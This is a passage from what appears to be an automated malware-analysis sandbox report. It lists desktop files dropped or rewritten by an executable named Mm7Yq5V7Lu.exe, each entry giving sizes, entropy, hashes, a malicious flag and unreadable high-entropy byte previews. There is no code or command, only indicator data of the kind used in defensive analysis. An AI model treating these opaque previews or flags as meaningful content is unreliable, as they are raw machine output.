                                                                                                                                                      Preview: ..p5jOD.....*@.^.:6.w:..6..Mc0#.I;.Xr.(.c.gl..:<k.k../ip.i....Z..|....[0....v@......'iRB|...9..:...n.}..71......Q..v.I.".;.|V2.........jJ.n.(..k.8..t....:Y...,..N..A.,B.u.L.W.h.g...,.+.e..9g}.g.N.u...u..`p`6,..*@.pk,.....Y0P.Iy<.\g.L...T.1.+.S .nv.pt..q.7Mo...h..........X.<......'...OZ....&/.4.....wz..{~.i.y.K1:.1.....].I...{.......g..b.......sZ..z.DuU...^v.N4....6(.-.<..gO.w+3....q..../.n0.....fO...0r..;..b;....L^K....R.JS.$@...L.....t..:.+`=.M.f.$K/..J._7......5..,..D.Y.......[)~......J...iD....J...E.L.5...._...w....W]..#.v........z....%.*.D.'.....".......J....... X.2.A6]uo...8.ma....b..s.LG.89..gH........F.#.p....=.V.Y.%...w.g?....A.9.|'.x........=U...z.Qu.|.-V$|-..2..j.@..;.G.9.EO.9....6.*.X...z>.Z.Z.6j...e..... n..-f...X....Bo..}U.E.GI.F3.....B.\.....U!y..Ec..(.zw[z..9.lB.s.lk.....U;,}...4.......S0....Qs.....\.......vC...&...!.......5Uf?....e[4E...v.....C.....U....I...nZ9.3....Y.,......5Tk.Z.bN.r...h..s.l.......4A.wB.Wh.6%.
                                                                                                                                                      C:\Users\user\Desktop\GRXZDKKVDB.xlsx.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.001414920840119
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:79MnNDI7xk/q6cvgPWhCaZ9J1SQ5EcypcgHMGzZZizAjeenW8OyUWxzK8sevWAVN:79MCxk/q6zinPoOtWxzCwgck383
                                                                                                                                                      MD5:6455E8DE68ECBAB8FA0C65F162436081
                                                                                                                                                      SHA1:73BE08E6E988922139856068E6D7C14FE55DDA81
                                                                                                                                                      SHA-256:2738CA9E40682A319AB748B5CDD649243A80D3006C86191C919E07BDEF353E5C
                                                                                                                                                      SHA-512:DC23CC1E09166063367B2079525C1E82DFF903CA3249ADF86413FAE726E56DE14EEB312AFB06DF4898BAAE188CA5E347014BBAAB8BCE7CC6DA04F9B9A165EE2C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..p5jOD.....*@.^.:6.w:..6..Mc0#.I;.Xr.(.c.gl..:<k.k../ip.i....Z..|....[0....v@......'iRB|...9..:...n.}..71......Q..v.I.".;.|V2.........jJ.n.(..k.8..t....:Y...,..N..A.,B.u.L.W.h.g...,.+.e..9g}.g.N.u...u..`p`6,..*@.pk,.....Y0P.Iy<.\g.L...T.1.+.S .nv.pt..q.7Mo...h..........X.<......'...OZ....&/.4.....wz..{~.i.y.K1:.1.....].I...{.......g..b.......sZ..z.DuU...^v.N4....6(.-.<..gO.w+3....q..../.n0.....fO...0r..;..b;....L^K....R.JS.$@...L.....t..:.+`=.M.f.$K/..J._7......5..,..D.Y.......[)~......J...iD....J...E.L.5...._...w....W]..#.v........z....%.*.D.'.....".......J....... X.2.A6]uo...8.ma....b..s.LG.89..gH........F.#.p....=.V.Y.%...w.g?....A.9.|'.x........=U...z.Qu.|.-V$|-..2..j.@..;.G.9.EO.9....6.*.X...z>.Z.Z.6j...e..... n..-f...X....Bo..}U.E.GI.F3.....B.\.....U!y..Ec..(.zw[z..9.lB.s.lk.....U;,}...4.......S0....Qs.....\.......vC...&...!.......5Uf?....e[4E...v.....C.....U....I...nZ9.3....Y.,......5Tk.Z.bN.r...h..s.l.......4A.wB.Wh.6%.
                                                                                                                                                      C:\Users\user\Desktop\Microsoft Edge.lnk
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2368
                                                                                                                                                      Entropy (8bit):7.231726580410012
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:EDAeZ9s/VUxDTTLnd1r8egV1i2eUAPEFTyzCwgck38Z:E2/+JTLnrzgV1vA/zTES
                                                                                                                                                      MD5:87D7E3B9DDEEB2D22CFE4A1812A50549
                                                                                                                                                      SHA1:2EE50CF1585B1C3E787F9BEA698CADBBE282CF1E
                                                                                                                                                      SHA-256:F6B7C585BC2EB90CF5978AE686E0B112D549BB8D35A626504DF8343955E8B984
                                                                                                                                                      SHA-512:044B8B495777BEF9660ECCE5BE36F9826CC91EAA74902E9F0C2E52668A5DC1A5DBE053A93D0696A5BC3F1A93D2280710D782CE2CA17216DDD0343D8DD34C03F5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..eeR..T.y..N6l....I......}l..r*.:..$....e.6.....:o.+.._....}Y5..O..0@..j.J\%<.....o;..6........b7......c.W.E.{#..bq.3.(..4.eg".3..gcm};S..^r........|j..K.~.J.....7^0N....L...........D..D.]k.....f....6n..a.K.z.Z6........x.".C...hv.>..f.-c....\.e....i.`O/.\.gVv~..s8.%@.~......./}.^O$.k..._pR...`...c.5...b..-V^...J.)...^..n...p..v.....?.*...Y4..3.zT.....6p{..k.k...X\.7.....$..J..G....Xf.........mm..b.!.......R.2U.1....g...Q...j$.O......X.......Q.^...I>..I....3..ST.>........=.W+l.H9.........]H/.u.]s./>..p..]...zY.E)I...n.cSY.?.....8.{!.....xl"TtM......[I.rM.p.L]v.w.v....ye._.<Y..1.i...Z...<.6%..{t:B..C.H...kZ.w.O...q..!g;.;..1.B...:.-Ao...KDp".].;.90.$...^..&......;...\Lg*...w..F....v8. r.....(~...1......@...+......z...k.....J}..}j.uxT..\.3..~Ig...-*JWd=.4..0.P..s.k...D...8......Ma..7.>./....t...?..G. N..6...=uL.5.."...mL.v...i 1...Ec.R.....$. :s..fP...[....6:;..n..}.Jj...U...,:V..........\...T4..c.....UZ.,..,....\..N....V....
                                                                                                                                                      C:\Users\user\Desktop\Microsoft Edge.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2368
                                                                                                                                                      Entropy (8bit):7.231726580410012
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:EDAeZ9s/VUxDTTLnd1r8egV1i2eUAPEFTyzCwgck38Z:E2/+JTLnrzgV1vA/zTES
                                                                                                                                                      MD5:87D7E3B9DDEEB2D22CFE4A1812A50549
                                                                                                                                                      SHA1:2EE50CF1585B1C3E787F9BEA698CADBBE282CF1E
                                                                                                                                                      SHA-256:F6B7C585BC2EB90CF5978AE686E0B112D549BB8D35A626504DF8343955E8B984
                                                                                                                                                      SHA-512:044B8B495777BEF9660ECCE5BE36F9826CC91EAA74902E9F0C2E52668A5DC1A5DBE053A93D0696A5BC3F1A93D2280710D782CE2CA17216DDD0343D8DD34C03F5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..eeR..T.y..N6l....I......}l..r*.:..$....e.6.....:o.+.._....}Y5..O..0@..j.J\%<.....o;..6........b7......c.W.E.{#..bq.3.(..4.eg".3..gcm};S..^r........|j..K.~.J.....7^0N....L...........D..D.]k.....f....6n..a.K.z.Z6........x.".C...hv.>..f.-c....\.e....i.`O/.\.gVv~..s8.%@.~......./}.^O$.k..._pR...`...c.5...b..-V^...J.)...^..n...p..v.....?.*...Y4..3.zT.....6p{..k.k...X\.7.....$..J..G....Xf.........mm..b.!.......R.2U.1....g...Q...j$.O......X.......Q.^...I>..I....3..ST.>........=.W+l.H9.........]H/.u.]s./>..p..]...zY.E)I...n.cSY.?.....8.{!.....xl"TtM......[I.rM.p.L]v.w.v....ye._.<Y..1.i...Z...<.6%..{t:B..C.H...kZ.w.O...q..!g;.;..1.B...:.-Ao...KDp".].;.90.$...^..&......;...\Lg*...w..F....v8. r.....(~...1......@...+......z...k.....J}..}j.uxT..\.3..~Ig...-*JWd=.4..0.P..s.k...D...8......Ma..7.>./....t...?..G. N..6...=uL.5.."...mL.v...i 1...Ec.R.....$. :s..fP...[....6:;..n..}.Jj...U...,:V..........\...T4..c.....UZ.,..,....\..N....V....
                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL.docx
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.00530053625583
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:HqlASPUGeuz+1kJSH6w/KeD2B1aEF2ntW/pDPCaC/zK8sevWAVgKTaCB7RZ0cHYD:yRcmz+18SHty/BUK2CpDqdzCwgck384
                                                                                                                                                      MD5:7DA28278FC54ECB700AB4877F813D53D
                                                                                                                                                      SHA1:0179CDB9E01AEF93D0FB67AF960F3B420D9A705C
                                                                                                                                                      SHA-256:B308A31149F6855676E4B9171B5B5C6F5DCE135B820CB97A217883F07D37F762
                                                                                                                                                      SHA-512:B56F68A9FAEC5AB495CC35D61CC4FF4E68304C9B2EEFD41BEB549143345DB4ED0742CD12DBCDFA44C141D32F9A8019ED470C38925DC8F425A54EE10F5943056A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .z.W>.2r......F..}..qv....e....H......gK..7...D..f.B..Wf...`...t;..#...2]....M+..yx..%Ne.,h.G..9.....)..~L..]...^..IR...Hk?l.....[L_....Ef~mNv..c....^@5.H?.,...%=8&.5.Mq.AR1....JTH.M. hGcmM.+..+..S...`%A..<.{O..........*uM....t.j...IG.:y.....Z..i^..X..a..eKZ5...#...O?..S..AJ.;N.&..q.......nz.tR.F....+5.|&...........v...#......~_.-..Sd0.9...&l.@..k..2...i;.?.<.+.P.3.5 ....-.fO.8I3...L...%.V..N.kT2G.nM..G.-...F...{'h..g..........NH.).+..0?..als....^n+....r.... ...../9.c..1..h.63.*.7..tt.K..0mHQM.J....:...........R[.....Vc&......2...\...&..T@.b...),.....1.Q.-.f.k.....;.k@x..r.o.8..]...N;u...].W..Ip.#.GQt.e.Ctv..Y..;@.0.g.".0...J...S.G..._....]....P....i.....4B..d...0N.O.1.H.`()5.j.`..,!..V.......@..m.A<......|u.nH..f.H;yj-..6N.........q.0.\.Q+0n.P9.J..A.E.....0....$M.(:..>..(%..%..c.L..a....\vi.AD<........Z+.........(.[<6..e..P...y.E...SDe....y....3]|h-.6...b...O...{..9.s._... <..^K.{.`..y....~.)W...%..3h..T..[.3..y..5.^
                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL.docx.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.00530053625583
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:HqlASPUGeuz+1kJSH6w/KeD2B1aEF2ntW/pDPCaC/zK8sevWAVgKTaCB7RZ0cHYD:yRcmz+18SHty/BUK2CpDqdzCwgck384
                                                                                                                                                      MD5:7DA28278FC54ECB700AB4877F813D53D
                                                                                                                                                      SHA1:0179CDB9E01AEF93D0FB67AF960F3B420D9A705C
                                                                                                                                                      SHA-256:B308A31149F6855676E4B9171B5B5C6F5DCE135B820CB97A217883F07D37F762
                                                                                                                                                      SHA-512:B56F68A9FAEC5AB495CC35D61CC4FF4E68304C9B2EEFD41BEB549143345DB4ED0742CD12DBCDFA44C141D32F9A8019ED470C38925DC8F425A54EE10F5943056A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .z.W>.2r......F..}..qv....e....H......gK..7...D..f.B..Wf...`...t;..#...2]....M+..yx..%Ne.,h.G..9.....)..~L..]...^..IR...Hk?l.....[L_....Ef~mNv..c....^@5.H?.,...%=8&.5.Mq.AR1....JTH.M. hGcmM.+..+..S...`%A..<.{O..........*uM....t.j...IG.:y.....Z..i^..X..a..eKZ5...#...O?..S..AJ.;N.&..q.......nz.tR.F....+5.|&...........v...#......~_.-..Sd0.9...&l.@..k..2...i;.?.<.+.P.3.5 ....-.fO.8I3...L...%.V..N.kT2G.nM..G.-...F...{'h..g..........NH.).+..0?..als....^n+....r.... ...../9.c..1..h.63.*.7..tt.K..0mHQM.J....:...........R[.....Vc&......2...\...&..T@.b...),.....1.Q.-.f.k.....;.k@x..r.o.8..]...N;u...].W..Ip.#.GQt.e.Ctv..Y..;@.0.g.".0...J...S.G..._....]....P....i.....4B..d...0N.O.1.H.`()5.j.`..,!..V.......@..m.A<......|u.nH..f.H;yj-..6N.........q.0.\.Q+0n.P9.J..A.E.....0....$M.(:..>..(%..%..c.L..a....\vi.AD<........Z+.........(.[<6..e..P...y.E...SDe....y....3]|h-.6...b...O...{..9.s._... <..^K.{.`..y....~.)W...%..3h..T..[.3..y..5.^
                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL.xlsx
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.023414156648126
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:NLorMQrpH5INgU8PBDzJd9QH4BMrzCwgck38H3q:lOr7y4BDzJd9/MrzTEGa
                                                                                                                                                      MD5:6D469EDCA66AF7985A0756078FADD7CC
                                                                                                                                                      SHA1:FE15CD72459919A6A4E9354892DC58E40452CD7C
                                                                                                                                                      SHA-256:506727F0A668811E6ED5E43DDA99FB64A02BB86076924E1AE71E2B4B1A6AC97A
                                                                                                                                                      SHA-512:3C40FD06CB70AF360C8C2B9B7D4F320BCF4F662DA89F0CA6CE54485B9E8B3337BDB2E24608D7D35532C15D58D2913328FA532CFD5E42002C339C39DAFE4BD84B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...[.....~I...4._u.8R..}..o.;z..X...4..4........w[..m.$(u..#E:..^...........;........4.?5..0..i.9...q..*.D..<.....n>...]b}[a...am'..=...Q.....D......X..P.....".N.....QV.9....[...X.fP:L;/..,.}V.> lMRN.n.T./...~"L.y....[....v./.N^.{.I.,..s.x.0...9ET.V8DH.t..u..@5.~.+...(.b5b.:...+..|."`.....(z.R.zL..H^?HD..w.!......P..O..D3...J.....!.....N&>c....eB>.3.|.N.O'. ..j....Uq%.2C.6f..a.ucJ.c../....z...`...s...9.zT....1...b.....W...9...Z...?.....^..W.<K.h...K.J3.R.....!\.p.G..F..2K.h({6....f...0.#C..gFNx.Q...X.."....aA.]?....b?......`w.......}.`'S..F7m^u...A$.N..Z...M..T..n..(.s.._R..w..shI.n[.Rkt^Yn(.trR./...e..d.....]E.Q+..vZ.%F..1.Y...8Z...~..@.w.VW.0..\..P.J../|....0.N.K.eO>.,......~..1.f.~...=Q....pH,.\lf.........Q.[Z.=..9.o.,BZ0{..K......5.....F{.... ...nj....Pxo.%t..:W#........`..#ow.v..p.4..e../G.K..v.D.7.f..^..c-".....`.y&,J....<....F.......'...x.AqB.n.....M.>...".k..o..+...A5Eob....=..T..jm...q.W.c(P...].S.....)n.z.G.......t.........:4......
                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL.xlsx.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.023414156648126
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:NLorMQrpH5INgU8PBDzJd9QH4BMrzCwgck38H3q:lOr7y4BDzJd9/MrzTEGa
                                                                                                                                                      MD5:6D469EDCA66AF7985A0756078FADD7CC
                                                                                                                                                      SHA1:FE15CD72459919A6A4E9354892DC58E40452CD7C
                                                                                                                                                      SHA-256:506727F0A668811E6ED5E43DDA99FB64A02BB86076924E1AE71E2B4B1A6AC97A
                                                                                                                                                      SHA-512:3C40FD06CB70AF360C8C2B9B7D4F320BCF4F662DA89F0CA6CE54485B9E8B3337BDB2E24608D7D35532C15D58D2913328FA532CFD5E42002C339C39DAFE4BD84B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...[.....~I...4._u.8R..}..o.;z..X...4..4........w[..m.$(u..#E:..^...........;........4.?5..0..i.9...q..*.D..<.....n>...]b}[a...am'..=...Q.....D......X..P.....".N.....QV.9....[...X.fP:L;/..,.}V.> lMRN.n.T./...~"L.y....[....v./.N^.{.I.,..s.x.0...9ET.V8DH.t..u..@5.~.+...(.b5b.:...+..|."`.....(z.R.zL..H^?HD..w.!......P..O..D3...J.....!.....N&>c....eB>.3.|.N.O'. ..j....Uq%.2C.6f..a.ucJ.c../....z...`...s...9.zT....1...b.....W...9...Z...?.....^..W.<K.h...K.J3.R.....!\.p.G..F..2K.h({6....f...0.#C..gFNx.Q...X.."....aA.]?....b?......`w.......}.`'S..F7m^u...A$.N..Z...M..T..n..(.s.._R..w..shI.n[.Rkt^Yn(.trR./...e..d.....]E.Q+..vZ.%F..1.Y...8Z...~..@.w.VW.0..\..P.J../|....0.N.K.eO>.,......~..1.f.~...=Q....pH,.\lf.........Q.[Z.=..9.o.,BZ0{..K......5.....F{.... ...nj....Pxo.%t..:W#........`..#ow.v..p.4..e../G.K..v.D.7.f..^..c-".....`.y&,J....<....F.......'...x.AqB.n.....M.>...".k..o..+...A5Eob....=..T..jm...q.W.c(P...].S.....)n.z.G.......t.........:4......
                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL\EIVQSAOTAQ.png
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.987286218765636
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:l6YjdXSLIZzwiI7Qeh27vaxzCwgck38Sm7:7dDZfWQehkaxzTEDs
                                                                                                                                                      MD5:3007AFF04491282FF5E50273CB3DEE92
                                                                                                                                                      SHA1:D570F9574101A9A9D63D9E9372ED0FFEA06ED39C
                                                                                                                                                      SHA-256:D869B53105106741CAE5F196953B8EDA4855A01F9C8500BAD7BE7CA8F1D95F22
                                                                                                                                                      SHA-512:29E5EF34486A7D4E046A3568583F1667068D54EBA6C65D4A182F0BDC1429ED1C37D45ABFCFD5361F13C4C4DF708A5AC713F5BE7887826555360D92D86363CB60
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: .....{..OOCa.t....s.......%..\._....TR-.H...pp.!.Y........V..#!.<e...D..dS..(.../..8..tv.q;......D_......*...!.nt.....Q.{....*.....=c..3A..g.I.....(p..H..F.&@A..u%.z~.+..J.,....O.....~..Gb+.....vq.....!..0X.i..7..)...x..V;....7a......9VM..<dy.....qM~.Q....cz.$.2.0dh.....5./........|.&.4.cB...:.1./.D. .,z...G..-(. ..o.M...MB.....6....>.G.J.tr@.)..-.W*d...A!..f;....).@..y.\T.}.O$.O.....D{..9..x....C.OA.l.^...6X+...X..o.M..i>2..5?..Uv.v.]...h.#b7.\.L.(...%.X.cx2J~H.Q..Z...a.^.=I..u..Y|.5..O..X.....|.B...f...^.E7-.}.?,.8...Y../&.}ge6........h.....F..4Z-....z.3....0.f.e..........~.s...z.u. .Y4..;l0}...5.BjJ....*.xU a.am..i..iZI....n%~.jQ.a..+..n..3...Vzzl.U.....%l.h....wn|....Z..0%....c........o....&..(..i..`...dP.. .WQO.@.... .gv.l....s.hYN-....'QX!.HQm.e.....;.x.."Z.....)Mkd.d.n....G.u...x.^<...Mx8.>....a..B..M...~;.:...y..V..O6..{.`.....<..,.G9....0......5..8B.Jo.$'....n.O...^SV..)...,qm..-. 7..]Gt.(_.Q..F.1U...t(.gQ.!..;DOE....L..z'......O...p
                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL\EIVQSAOTAQ.png.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.987286218765636
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:l6YjdXSLIZzwiI7Qeh27vaxzCwgck38Sm7:7dDZfWQehkaxzTEDs
                                                                                                                                                      MD5:3007AFF04491282FF5E50273CB3DEE92
                                                                                                                                                      SHA1:D570F9574101A9A9D63D9E9372ED0FFEA06ED39C
                                                                                                                                                      SHA-256:D869B53105106741CAE5F196953B8EDA4855A01F9C8500BAD7BE7CA8F1D95F22
                                                                                                                                                      SHA-512:29E5EF34486A7D4E046A3568583F1667068D54EBA6C65D4A182F0BDC1429ED1C37D45ABFCFD5361F13C4C4DF708A5AC713F5BE7887826555360D92D86363CB60
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .....{..OOCa.t....s.......%..\._....TR-.H...pp.!.Y........V..#!.<e...D..dS..(.../..8..tv.q;......D_......*...!.nt.....Q.{....*.....=c..3A..g.I.....(p..H..F.&@A..u%.z~.+..J.,....O.....~..Gb+.....vq.....!..0X.i..7..)...x..V;....7a......9VM..<dy.....qM~.Q....cz.$.2.0dh.....5./........|.&.4.cB...:.1./.D. .,z...G..-(. ..o.M...MB.....6....>.G.J.tr@.)..-.W*d...A!..f;....).@..y.\T.}.O$.O.....D{..9..x....C.OA.l.^...6X+...X..o.M..i>2..5?..Uv.v.]...h.#b7.\.L.(...%.X.cx2J~H.Q..Z...a.^.=I..u..Y|.5..O..X.....|.B...f...^.E7-.}.?,.8...Y../&.}ge6........h.....F..4Z-....z.3....0.f.e..........~.s...z.u. .Y4..;l0}...5.BjJ....*.xU a.am..i..iZI....n%~.jQ.a..+..n..3...Vzzl.U.....%l.h....wn|....Z..0%....c........o....&..(..i..`...dP.. .WQO.@.... .gv.l....s.hYN-....'QX!.HQm.e.....;.x.."Z.....)Mkd.d.n....G.u...x.^<...Mx8.>....a..B..M...~;.:...y..V..O6..{.`.....<..,.G9....0......5..8B.Jo.$'....n.O...^SV..)...,qm..-. 7..]Gt.(_.Q..F.1U...t(.gQ.!..;DOE....L..z'......O...p
                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL\EOWRVPQCCS.jpg
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.034538448138179
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:xIscsge0VASaV1jiQUbsdY5GD5EKzCwgck388:tcrHVA7nsG2KzTEn
                                                                                                                                                      MD5:B6CE677A547EC13F4A831A867619E4DF
                                                                                                                                                      SHA1:8C0D31C58D9A7ED121809FBC2D6EBFA1ED72A245
                                                                                                                                                      SHA-256:EEF98062BC3C0DE53DA5619BC91E8D46549D09094AC533C79F39CDB70468E9BC
                                                                                                                                                      SHA-512:D10BFEF2254C511D23298F85A5FC6C4CD6DFFB8D8901669A05447DA1CEF31246D4EC355BD785B6E1150E154107954253179B8CBDAC999900612ACC0BEB0CF7E5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..o.ke........9.M....^r...?|....R...`G....fD....6.....KT..).%.3.CFD.s..A...i...{.T.......tZ.2I|pv......As.!..j..............Q.(../.t3.`o..{q`5...E/.biP:.z^..LUu......^0....c....W.4...P1.QP<.....n...d.;._.!...b....@...s_r....[.%&...V..s0..Q>l..%O............oz.0.gJD..R.-.zQ.K"..8~..* ..3...).K..w....C.5...../\i...&,.{[....TB..:....{.nn..,e...z(.......2..Ai.EZ.]..fn..rJ*..3?.Q...b..y....s.RPa.L./)..\...a..}..s?....pV..4........C.O....m..p..6.o........Z.......v.O.&(.W..!g..;k.w..qq....S0.L..!..+..$h.yv....(.1b.C.)[.C..+....r%.~.R...8`]|.)?..O..........Ca.P{.}..z.lH....S.!.bS...t.k.....#.....$...W{A.:.{J.n.?X(.0..j..Ix|/D..;.e..I~.B..%O.{...I...M.....Yi...5...|y......YC.v.h.o.{.....HR..4...t......Jj........I....a.....]0....L&X..,...%...&).....i.1....9EzX........+..yoq...%.YR..G&}.C..aK...#.a.._Q#....+..S.'.].:y^..m.F:4.....92.....L>9..NN...M..Na@A.L.9t.'.JNK.G.......8......I..'=.....j.{e.|..FT;$...../....._.K...A.........<.......#...q?.mk.x.F.
                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL\EOWRVPQCCS.jpg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.034538448138179
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:xIscsge0VASaV1jiQUbsdY5GD5EKzCwgck388:tcrHVA7nsG2KzTEn
                                                                                                                                                      MD5:B6CE677A547EC13F4A831A867619E4DF
                                                                                                                                                      SHA1:8C0D31C58D9A7ED121809FBC2D6EBFA1ED72A245
                                                                                                                                                      SHA-256:EEF98062BC3C0DE53DA5619BC91E8D46549D09094AC533C79F39CDB70468E9BC
                                                                                                                                                      SHA-512:D10BFEF2254C511D23298F85A5FC6C4CD6DFFB8D8901669A05447DA1CEF31246D4EC355BD785B6E1150E154107954253179B8CBDAC999900612ACC0BEB0CF7E5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..o.ke........9.M....^r...?|....R...`G....fD....6.....KT..).%.3.CFD.s..A...i...{.T.......tZ.2I|pv......As.!..j..............Q.(../.t3.`o..{q`5...E/.biP:.z^..LUu......^0....c....W.4...P1.QP<.....n...d.;._.!...b....@...s_r....[.%&...V..s0..Q>l..%O............oz.0.gJD..R.-.zQ.K"..8~..* ..3...).K..w....C.5...../\i...&,.{[....TB..:....{.nn..,e...z(.......2..Ai.EZ.]..fn..rJ*..3?.Q...b..y....s.RPa.L./)..\...a..}..s?....pV..4........C.O....m..p..6.o........Z.......v.O.&(.W..!g..;k.w..qq....S0.L..!..+..$h.yv....(.1b.C.)[.C..+....r%.~.R...8`]|.)?..O..........Ca.P{.}..z.lH....S.!.bS...t.k.....#.....$...W{A.:.{J.n.?X(.0..j..Ix|/D..;.e..I~.B..%O.{...I...M.....Yi...5...|y......YC.v.h.o.{.....HR..4...t......Jj........I....a.....]0....L&X..,...%...&).....i.1....9EzX........+..yoq...%.YR..G&}.C..aK...#.a.._Q#....+..S.'.].:y^..m.F:4.....92.....L>9..NN...M..Na@A.L.9t.'.JNK.G.......8......I..'=.....j.{e.|..FT;$...../....._.K...A.........<.......#...q?.mk.x.F.
                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL\GIGIYTFFYT.mp3
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.01051768535967
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:o8QPMyxnE/4NAcTaG/jCpGGTzU61/zCwgck38A/:o8Q0yxEM59sGi/zTEb
                                                                                                                                                      MD5:8B324AB6F6FF114B700C55A2428738B2
                                                                                                                                                      SHA1:224A042118535F7B1D6900D7FB5FA559EEAA207B
                                                                                                                                                      SHA-256:1FACBA1FDA8BC1D30EF23B9385F3D77EDDFF1BA86FEDC09DA70B60068DFB95E6
                                                                                                                                                      SHA-512:74D0F2B481BD37E576547B99B204B485B04434BDD82F23629F6C5C948A45964288F15ACA4A61DE822891FCF917D13616FBFB8DA9336B05D5F5F655C121441DAD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..ul;.[.S.4.@.<4.o...n..2....x.*r...&../...S(:}2u.Y.zf........f.-..`Ox.;..o..6..qg. .......z..l{..5l.J....N.x...%.g.....P...tO..UB...v....TPd.(e.)J..N.'...`M.H...U..F....5.yx.U.x.\.$M..3....&M8..dD.C.......18[..l.DGt.AX./....;...Dz.s.A@cf>,J.a.(..lJ......C..Z..4.OSx..#.....-.y9._.......+.E.......K{.XD...B.....bF......l....7....59.b..'L.Z.......^.3j%y.........Lt.!.+$....Y..B...YfYo...#.i..A .}O%M...5>...T....h.8..vh.0..@...F.g.|7....=...xy..A..L$.VN....Z.d%.8.H........~I.......YI.y.F._.Z...h....E..{....gW.....?C..:.D.z..'.`..)...vY..._..`.s.......O.=$.iGh..p..E..O.Uf;..j>.. c..\.].....PT.s..|1..64naHF.....W.......[$....H..^;..g..|.A)eUE.s>....Utf.h...:^..vavV9....K..Rh....I1?.A.X....Li.....ABVP.....=..-J.>.|?.d.....|Bz.9O.l+Kv.t.A.....K......c..]...#.....*Z.7m..M.N....>vp.......C..$...gnT.e.....+"x..J'D0......2a..u...f..Nd:...p..B.T.._....GM1.._.......|w...}....u.cA|..!...r..3@.c0...P. -;.......~.:...........".[^M.<............D.im.^.:.g8.
                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL\GIGIYTFFYT.mp3.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.01051768535967
